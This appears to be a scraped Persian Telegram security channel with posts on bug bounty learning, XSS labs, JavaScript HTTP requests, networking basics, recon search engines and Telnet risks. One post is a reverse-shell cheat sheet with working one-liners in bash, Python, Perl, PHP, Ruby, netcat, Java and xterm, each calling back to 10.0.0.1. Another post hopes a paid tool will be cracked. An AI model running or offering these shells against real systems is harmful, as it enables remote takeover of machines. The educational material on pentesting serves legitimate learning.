✍🏻یکی از کارهایی که لازمه موقع مطالعه انجام بدید، نکته برداریه خیلی از افراد توی دفتر مینویسن که خوب مدیریت و سازماندهیشون سختی داره
اینجا چند تا نرم افزار معرفی کردم برای نکته برداری که خیلی به دسته بندی و سازماندهی مطالبتون کمک میکنه:
Notion
نوشن یک ابزار انلاین و بسیار قدرتمند هست
AFFiNE
این ابزار اپن سورسه و از ابزار هایی مثل Notion ,Miro ,... الهام گرفته شده
Obsidian
این ابزار افلاین هست . به کامل بودن نوشن نیست البته
Cherrytree
One_note
🧐البته من Notion , Obsidian , AFFiNE رو پیشنهاد میدم.
#note
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
اینجا چند تا نرم افزار معرفی کردم برای نکته برداری که خیلی به دسته بندی و سازماندهی مطالبتون کمک میکنه:
Notion
نوشن یک ابزار انلاین و بسیار قدرتمند هست
AFFiNE
این ابزار اپن سورسه و از ابزار هایی مثل Notion ,Miro ,... الهام گرفته شده
Obsidian
این ابزار افلاین هست . به کامل بودن نوشن نیست البته
Cherrytree
One_note
🧐البته من Notion , Obsidian , AFFiNE رو پیشنهاد میدم.
#note
#updateممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍18❤2👎1
🔥معرفی یک سایت خفن درمورد XSS:
توی این سایت همراه با مثال های عملی با کدهای sink و source اشنا خواهید شد.
کدهای sink: تیکه کدهای خطرناک که باعث تزریق کد مخرب میشه
https://domgo.at/cxss/intro
#XSS
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
توی این سایت همراه با مثال های عملی با کدهای sink و source اشنا خواهید شد.
کدهای sink: تیکه کدهای خطرناک که باعث تزریق کد مخرب میشه
https://domgo.at/cxss/intro
#XSS
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍13🔥2👎1
📖به نظرم خیلی ساده tools هارو توضیح داده...
توصیه میکنم بخونید.
https://medium.com/@malishakali2002/bug-bounty-tools-bedcf7b94f8d
#writeup #tools #bug_bounty_tools
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
توصیه میکنم بخونید.
https://medium.com/@malishakali2002/bug-bounty-tools-bedcf7b94f8d
#writeup #tools #bug_bounty_tools
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍5❤1
🕸دو یار همیشگی در دنیای شبکه!
فرض کنید در یک آپارتمان شلوغ زندگی میکنید. برای اینکه نامهها و بستهها به دستتون برسه، به یه آدرس پستی منحصر به فرد نیاز دارید، درسته؟ همین داستان برای دستگاههای شبکه هم صدق میکنه.
آدرس IP مثل همون آدرس پستی عمل میکنه. یه کد عددی منحصر به فرد که به هر دستگاه متصل به شبکه داده میشه تا بقیه بتونن اطلاعات رو بهش برسونن.
اما یه کد دیگه هم هست به اسم آدرس MAC. این کد مثل اثر انگشت میمونه که هر کارت شبکه رو به طور خاص شناسایی میکنه.
🧐تفاوت این دو آدرس کجاست؟
یک: IP برای فرستادن و دریافت اطلاعات در کل اینترنت استفاده میشه، مثل فرستادن ایمیل یا وبگردی.
دو: MAC برای شناختن دستگاهها تو یه شبکه محلی مثلا خونه یا محل کار به کار میره.
شبیه یه تیم خوب، IP و MAC با هم کار میکنند تا شبکه رو یه جای امن و کارآمد نگه دارن.
🎯نکات جالب:
یک: IP میتونه تغییر کنه، مثلا وقتی به اینترنت وصل میشید یه IP جدید بهتون داده میشه.
دو: MAC هیچوقت تغییر نمیکنه، مثل اثر انگشت ثابته!
میشه با IP و MAC کلی کارای دیگه هم کرد، مثلا میشه جلوی ورود افراد غریبه به شبکه رو گرفت یا مشکلات شبکه رو پیدا کرد.
#network_basic #ip #mac #network
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
فرض کنید در یک آپارتمان شلوغ زندگی میکنید. برای اینکه نامهها و بستهها به دستتون برسه، به یه آدرس پستی منحصر به فرد نیاز دارید، درسته؟ همین داستان برای دستگاههای شبکه هم صدق میکنه.
آدرس IP مثل همون آدرس پستی عمل میکنه. یه کد عددی منحصر به فرد که به هر دستگاه متصل به شبکه داده میشه تا بقیه بتونن اطلاعات رو بهش برسونن.
اما یه کد دیگه هم هست به اسم آدرس MAC. این کد مثل اثر انگشت میمونه که هر کارت شبکه رو به طور خاص شناسایی میکنه.
🧐تفاوت این دو آدرس کجاست؟
یک: IP برای فرستادن و دریافت اطلاعات در کل اینترنت استفاده میشه، مثل فرستادن ایمیل یا وبگردی.
دو: MAC برای شناختن دستگاهها تو یه شبکه محلی مثلا خونه یا محل کار به کار میره.
شبیه یه تیم خوب، IP و MAC با هم کار میکنند تا شبکه رو یه جای امن و کارآمد نگه دارن.
🎯نکات جالب:
یک: IP میتونه تغییر کنه، مثلا وقتی به اینترنت وصل میشید یه IP جدید بهتون داده میشه.
دو: MAC هیچوقت تغییر نمیکنه، مثل اثر انگشت ثابته!
میشه با IP و MAC کلی کارای دیگه هم کرد، مثلا میشه جلوی ورود افراد غریبه به شبکه رو گرفت یا مشکلات شبکه رو پیدا کرد.
#network_basic #ip #mac #network
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍10👎3🤔3🤩1
🐝ارسال درخواست با جاوا اسکریپت:
یکی از دانش های مورد نیاز از جاوا اسکریپت ارسال درخواست (http) هست.
دو روش رایج برای ارسال درخواست با جاوا اسکریپت وجود دارد:
1. استفاده از XML HttpRequest (XHR)
2. استفاده از Fetch API مدرنتر و کاربرپسندتر است
ارسال درخواست GET با XHR:
یک نمونه کد ساده برای ارسال درخواست GET با استفاده از XHR :
ارسال درخواست POST با XHR:
برای ارسال درخواست POST با XHR، باید از هدر
در پست بعدی به بررسی ارسال درخواست با Fetch API میپردازیم.
#basic #javascript #پیشنیاز #جاوااسکریپت #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
یکی از دانش های مورد نیاز از جاوا اسکریپت ارسال درخواست (http) هست.
دو روش رایج برای ارسال درخواست با جاوا اسکریپت وجود دارد:
1. استفاده از XML HttpRequest (XHR)
2. استفاده از Fetch API مدرنتر و کاربرپسندتر است
ارسال درخواست GET با XHR:
یک نمونه کد ساده برای ارسال درخواست GET با استفاده از XHR :
const xhr = new XMLHttpRequest();
xhr.open('GET', 'https://www.example.com/data.json');
xhr.onload = function() {
if (xhr.status === 200) {
console.log(JSON.parse(xhr.responseText));
} else {
console.error('Error:', xhr.statusText);
}
};
xhr.send();
ارسال درخواست POST با XHR:
برای ارسال درخواست POST با XHR، باید از هدر
Content-Type برای داده ارسالی استفاده کنید.const xhr = new XMLHttpRequest();```
xhr.open('POST', 'https://www.example.com/submit-data');
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.onload = function() {
if (xhr.status === 200) {
console.log('Data submitted successfully!');
} else {
console.error('Error:', xhr.statusText);
}
};
const data = {
name: 'John Doe',
email: '[email protected]',
message: 'This is a test message.'
};
xhr.send(JSON.stringify(data));
در پست بعدی به بررسی ارسال درخواست با Fetch API میپردازیم.
#basic #javascript #پیشنیاز #جاوااسکریپت #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍17
Security hint pinned «📣 سلام به همراهان عزیز ❤️ این کانال با محوریت امنیت وب، پنتست و باگ بانتی ایجاد شده، تا افراد علاقمند به این حوزه را راهنمایی کنیم. دانشی که برای شروع این حوزه لازم دارید در این پست گفته شده : https://t.iss.one/sec_hint/106 و بعداز آن شناخت آسیب پذیری ها، اکسپلویت…»
🔍 Search Engines for Bug hunter & Security Pro : [ Recon is the key ]
1. https://google.com - Dorks
2. https://shodan.io - Servers
3. https://censys.io - Servers
4. https://hunter.io - Mail addresses
5. https://fullhunt.io - Attack Surface
6. https://onyphe.io - Servers
7. https://socradar.io - Threat Intelligence
8. https://binaryedge.io - Attack Surface
9. https://intelx.io - OSINT
10. https://crt.sh - Certificate search
11. https://vulners.com - Vulnerabilities
12. https://securitytrails.com - Servers
#CyberSecurity #bugbounty #bugbountytips
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
1. https://google.com - Dorks
2. https://shodan.io - Servers
3. https://censys.io - Servers
4. https://hunter.io - Mail addresses
5. https://fullhunt.io - Attack Surface
6. https://onyphe.io - Servers
7. https://socradar.io - Threat Intelligence
8. https://binaryedge.io - Attack Surface
9. https://intelx.io - OSINT
10. https://crt.sh - Certificate search
11. https://vulners.com - Vulnerabilities
12. https://securitytrails.com - Servers
#CyberSecurity #bugbounty #bugbountytips
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
Shodan
Search engine of Internet-connected devices. Create a free account to get started.
👍9❤1
🗽چلنج هایی برای تمرین XSS
prompt.ml
alf.nu/alert1
xss-game.appspot.com
polyglot.innerht.ml
sudo.co.il/xss
root-me.org
chefsecure.com
wechall.net
codelatte.id/labs/xss
#lab #Challenges #xss
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
prompt.ml
alf.nu/alert1
xss-game.appspot.com
polyglot.innerht.ml
sudo.co.il/xss
root-me.org
chefsecure.com
wechall.net
codelatte.id/labs/xss
#lab #Challenges #xss
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍6❤1
🤖پروتکلی کهنه ولی کاربردی
Telnet:
یه پروتکل شبکه مبتنی بر متن هست که به شما اجازه میده از راه دور به یه کامپیوتر دیگه وصل بشید و دستورات رو اجرا کنید.
☕️کاربردهای Telnet:
مدیریت از راه دور: Telnet یه ابزار قدرتمند برای مدیریت از راه دور سرورها، روترها و سایر تجهیزات شبکه هست.
عیب یابی: با Telnet میتونید مشکلات شبکه رو عیب یابی کنید و علت خطاها رو پیدا کنید.
آزمایش پورت ها: Telnet یه روش ساده برای اسکن پورت های یه کامپیوتر و بررسی باز یا بسته بودن اونهاست.
آموزش: Telnet میتونه یه ابزار آموزشی مفید برای یادگیری مفاهیم پایه ای شبکه و دستورات لینوکس باشه.
🕳چالشهای امنیتی Telnet:
وTelnet یه پروتکل ناامن هست که اطلاعات رو به صورت واضح (Plain Text) ارسال میکنه.
این موضوع Telnet رو به یه طعمه لذیذ برای هکرها تبدیل کرده و استفاده از اون در دنیای امروز که خطرات سایبری به طور چشمگیری افزایش پیدا کردن، به شدت غیرقابل توصیه هست.
🪃مشکلات امنیتی Telnet:
عدم رمزنگاری: اطلاعات ارسالی و دریافتی در Telnet به صورت رمزنگاری نشده هستن و به راحتی قابل رهگیری و شنود توسط هکرها هستن.
حمله Man-in-the-Middle: هکرها میتونن بین شما و کامپیوتر مقصد قرار بگیرن و به تمام اطلاعات ارسالی و دریافتی دسترسی پیدا کنن.
جعل هویت: هکرها میتونن با جعل هویت شما، به کامپیوتر مقصد متصل بشن و دستورات مخرب اجرا کنن.
جایگزینهای امنتر Telnet:
با توجه به مشکلات امنیتی Telnet، استفاده از جایگزینهای امنتر به شدت توصیه میشه.
جایگزینی برای داشتن ارتباط امن:
SSH:
یه پروتکل امن برای اتصال از راه دور هست که از رمزنگاری قوی برای محافظت از اطلاعات استفاده میکنه.
#Telnet #امنیت_وب #هک #آسیب_پذیری #اسکن #نفوذ
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
Telnet:
یه پروتکل شبکه مبتنی بر متن هست که به شما اجازه میده از راه دور به یه کامپیوتر دیگه وصل بشید و دستورات رو اجرا کنید.
☕️کاربردهای Telnet:
مدیریت از راه دور: Telnet یه ابزار قدرتمند برای مدیریت از راه دور سرورها، روترها و سایر تجهیزات شبکه هست.
عیب یابی: با Telnet میتونید مشکلات شبکه رو عیب یابی کنید و علت خطاها رو پیدا کنید.
آزمایش پورت ها: Telnet یه روش ساده برای اسکن پورت های یه کامپیوتر و بررسی باز یا بسته بودن اونهاست.
آموزش: Telnet میتونه یه ابزار آموزشی مفید برای یادگیری مفاهیم پایه ای شبکه و دستورات لینوکس باشه.
🕳چالشهای امنیتی Telnet:
وTelnet یه پروتکل ناامن هست که اطلاعات رو به صورت واضح (Plain Text) ارسال میکنه.
این موضوع Telnet رو به یه طعمه لذیذ برای هکرها تبدیل کرده و استفاده از اون در دنیای امروز که خطرات سایبری به طور چشمگیری افزایش پیدا کردن، به شدت غیرقابل توصیه هست.
🪃مشکلات امنیتی Telnet:
عدم رمزنگاری: اطلاعات ارسالی و دریافتی در Telnet به صورت رمزنگاری نشده هستن و به راحتی قابل رهگیری و شنود توسط هکرها هستن.
حمله Man-in-the-Middle: هکرها میتونن بین شما و کامپیوتر مقصد قرار بگیرن و به تمام اطلاعات ارسالی و دریافتی دسترسی پیدا کنن.
جعل هویت: هکرها میتونن با جعل هویت شما، به کامپیوتر مقصد متصل بشن و دستورات مخرب اجرا کنن.
جایگزینهای امنتر Telnet:
با توجه به مشکلات امنیتی Telnet، استفاده از جایگزینهای امنتر به شدت توصیه میشه.
جایگزینی برای داشتن ارتباط امن:
SSH:
یه پروتکل امن برای اتصال از راه دور هست که از رمزنگاری قوی برای محافظت از اطلاعات استفاده میکنه.
#Telnet #امنیت_وب #هک #آسیب_پذیری #اسکن #نفوذ
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍8❤1
💀دنیای ناشناخته ی JavaScript
یه چلنج از root-me که شمارو با دنیای دیگه از javascript آشنا میکنه:
https://www.root-me.org/en/Challenges/Web-Client/Javascript-Native-code
#js #javascript #root_me #جاوااسکریپت #Challenges
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
یه چلنج از root-me که شمارو با دنیای دیگه از javascript آشنا میکنه:
https://www.root-me.org/en/Challenges/Web-Client/Javascript-Native-code
#js #javascript #root_me #جاوااسکریپت #Challenges
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍6❤2🤔1
Security hint
🐝ارسال درخواست با جاوا اسکریپت: یکی از دانش های مورد نیاز از جاوا اسکریپت ارسال درخواست (http) هست. دو روش رایج برای ارسال درخواست با جاوا اسکریپت وجود دارد: 1. استفاده از XML HttpRequest (XHR) 2. استفاده از Fetch API مدرنتر و کاربرپسندتر است ارسال…
🍥ارسال درخواستهای Fetch API در جاوا اسکریپت
در این پست، به بررسی نحوه ارسال درخواستهای GET و POST با استفاده از Fetch API در جاوا اسکریپت می پردازیم. Fetch API یک رابط مدرن و قدرتمند برای انجام درخواستهای HTTP در مرورگرهای وب است.
💥GET request
یک درخواست GET برای دریافت اطلاعات از یک سرور استفاده میشود. برای ارسال یک درخواست GET با Fetch API، مراحل زیر را دنبال کنید:
💥POST request
یک درخواست POST برای ارسال اطلاعات به یک سرور استفاده میشود. برای ارسال یک درخواست POST با Fetch API، مراحل زیر را دنبال کنید:
#JavaScript #FetchAPI #GET #POST #پیشنیاز #جاوااسکریپت #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
در این پست، به بررسی نحوه ارسال درخواستهای GET و POST با استفاده از Fetch API در جاوا اسکریپت می پردازیم. Fetch API یک رابط مدرن و قدرتمند برای انجام درخواستهای HTTP در مرورگرهای وب است.
💥GET request
یک درخواست GET برای دریافت اطلاعات از یک سرور استفاده میشود. برای ارسال یک درخواست GET با Fetch API، مراحل زیر را دنبال کنید:
fetch('https://api.example.com/data')
.then(response => response.json())
.then(data => console.log(data))
.catch(error => console.error(error));💥POST request
یک درخواست POST برای ارسال اطلاعات به یک سرور استفاده میشود. برای ارسال یک درخواست POST با Fetch API، مراحل زیر را دنبال کنید:
const data = { name: 'Alice', age: 30 };
const jsonData = JSON.stringify(data);
fetch('https://api.example.com/users', {
method: 'POST',
body: jsonData,
headers: { 'Content-Type': 'application/json' }
})
.then(response => response.json())
.then(data => console.log(data))
.catch(error => console.error(error));#JavaScript #FetchAPI #GET #POST #پیشنیاز #جاوااسکریپت #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
❤5🦄1
Security hint
👻👻👻👻👻👻👻 براتون اینجا گذاشتم https://youtu.be/B7Sn709pLVE 😉😉😉
👑Reverse Shell Cheat Sheet
Bash:
Python:
PERL:
PHP:
Ruby:
Netcat:
Java:
xterm:
#Reverse_Shell #Cheat_Sheet
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
Bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'PERL:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'PHP:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'Ruby:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'Netcat:
nc -e /bin/sh 10.0.0.1 1234
Java:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm:
xterm -display 10.0.0.1:1
#Reverse_Shell #Cheat_Sheet
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
❤6👍3👻1
☠️جایگزینی برای BurpSuite
https://freedium.cfd/https://medium.com/@lmoise2022/one-of-the-newest-tools-in-pentesting-b93e8434c08a
اپدیت: البته این تولز رایگان نیست، اگه کرک بشه عالی میشه🥲
#BurpSuite #Caido #tools
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
https://freedium.cfd/https://medium.com/@lmoise2022/one-of-the-newest-tools-in-pentesting-b93e8434c08a
اپدیت: البته این تولز رایگان نیست، اگه کرک بشه عالی میشه🥲
#BurpSuite #Caido #tools
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍4
javascript-beginner-handbook.pdf
544.7 KB
📖 هنوز JavaScript یاد نگرفتی؟؟
پس از این کتاب برای شروع استفاده کن ...
خلاصه و ساده مباحث رو توضیح داده ☺️
#book #javascript #beginner
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
پس از این کتاب برای شروع استفاده کن ...
خلاصه و ساده مباحث رو توضیح داده ☺️
#book #javascript #beginner
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
❤8👍2💯2🔥1